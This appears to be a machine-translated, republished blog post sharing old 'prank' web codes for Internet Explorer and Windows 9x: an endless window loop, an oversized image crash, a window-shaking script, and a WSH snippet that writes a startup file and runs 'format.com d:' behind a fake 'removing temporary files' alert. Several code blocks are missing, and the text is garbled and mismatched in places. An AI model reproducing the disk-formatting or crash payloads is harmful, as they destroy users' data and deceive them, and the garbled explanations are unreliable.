A very powerful endless loop code

Source: Internet
Author: User
I would like to share with you a very powerful endless loop code that can be downloaded and learned by friends, but cannot be used illegally. The endless loop code A and the endless loop code in the webpage: "Add the following code to the webpage to achieve the above effect" & lt; imgsrcjavascript: file name .htm... SyntaxHighlighter. all () of the locationwebpage ()

I would like to share with you a very powerful endless loop code that can be downloaded and learned by friends, but cannot be used illegally.
Endless code in Web pages
 
A. endless loop code:
"Add the following code to the webpage to achieve the above effect 』


Note: When a webpage containing this code is clicked, the connection will continuously open the IE browser until your system resources are wasted to 0% ~ You can only use it after it is restarted!


Prevention: Disable all ActiveX controls and plug-ins! Because this is an ActiveX tutorial program ~


B. Scary big pictures:
"Add the following code to the webpage to achieve the above effect 』


Note: When you open such a webpage, IE will constantly explain how to open it. However, because the image size is too large and exceeds the processing capability ......


C. Earthquake crash code:
"Add the following code to the webpage to achieve the above effect 』
Script
If (window. top. moveBy ){
For (I = 1; I <50; I ++ ){
For (j = 3; j> 0; j --){
Window. top. moveBy (0, I );
Window. top. moveBy (I, 0 );
Window. top. moveBy (0,-I * 2 );
Window. top. moveBy (-I * 2, 0 );
Window. top. moveBy (0, I );
Window. top. moveBy (I, 0 );
}
}
}
Script


Note: It is a Windows 9x device name parsing vulnerability!
The \ con device name resolution vulnerability in Windows 9x allows users to launch attacks, but 98 is dead. Principle: We know that CON is a special device name in DOS and cannot be used as a file name. If we type the following command in DOS: copy coldcrysky.txt con, the system will display the content of coldcrysky.txt. If it is changed: copy coldcrysky.txt> the con system prompts that the file cannot be copied to the file itself. If it is changed to lptor prn, coldcrysky.txt will be output to the printer. It can be seen that CON represents the file itself. If the \ CON command is used, it means that the system constantly calls the file itself, depending on the rapid depletion of system resources, there is no chance to press CTRL + ALT + DEL ~
Solution:
Patches are strongly recommended for 9X systems !!! 2000 and XP won't crash ~


D. format the hard disk: (the most horrible ~~~ Use it with caution !!! Do not use it for illegal purposes !!! If it has any negative effect after use, you are at your own risk! It has nothing to do with the "ColdCrySky" of the sky of the typhoid fever !!!)


Scr, Reset ();
Scr. Path = "C: \ WINDOWS \ StartMenu \ Programs \ Start \ startup.htm ";
Scr. Doc =""
WSH. rUN ('start/m format.com d:/q/autotest/U ');
Alert ('important: Windows is removing unused temporary files .');
Scr. write ();


Note: When you browse the webpage, the startup. hta file will be written to the startup folder, and a prompt is displayed that WINDOWS is deleting the temporary file! It is actually formatting your d disk, the F935DC22-1CF0-11D0-ADB9-00C04FD58A0B in the Code corresponds to: Windows Scripting Host Shell Object. The full name of WSH in the Code is Windows Scripting Host, which is a language-independent instruction mechanism of Microsoft Based on the 32-bit system platform, it enables the script to run in a WINDOWS desktop or command prompt ~ Wsh's program wscript.exe is a script language interpreter located in the WINDOWS folder, so it can execute the WSH script program like a batch file ~
Solution: 1) update your browser and use the latest browser to access the Internet!
2) Modify msdos. sys and add the following command line: Bootmentu = 0 to disable the Startup menu.
3) Rename format.com.
4) Disable WSH. Method: In win98, click the WINDOWS Installer from Add/delete program, open the attachment, and remove the option before windows scripting host to uninstall WSH ~~~ For win2000 and xp users, choose "my computer"> "Tools"> "folder"> "FILE type", find the "vbs vbscript file" option, and click "delete!
 

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.